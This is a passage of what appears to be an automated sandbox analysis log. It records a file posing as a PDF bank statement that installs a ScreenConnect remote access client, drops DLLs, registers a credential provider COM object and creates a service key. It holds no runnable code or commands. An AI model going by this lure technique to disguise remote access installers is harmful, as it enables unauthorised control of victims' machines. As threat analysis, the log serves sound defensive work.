                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: amsi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: msasn1.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: gpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rasapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rasman.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rtutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winhttp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

                      Persistence and Installation Behavior

                      barindex
                      Source: c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-1b99-d78ca2f0bc1a}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-1b99-d78ca2f0bc1a}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-1b99-d78ca2f0bc1a}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-1b99-d78ca2f0bc1a}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-1b99-d78ca2f0bc1a}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-1b99-d78ca2f0bc1a}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-1b99-d78ca2f0bc1a}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-1b99-d78ca2f0bc1a}\inprocserver32
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\Unconfirmed 701254.crdownloadJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI73FE.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.Windows.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\1dbdd63f-4d6b-4298-ade7-fe6b36b28adf.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI73FE.tmpJump to dropped file
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6cb77284cf765aa)
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
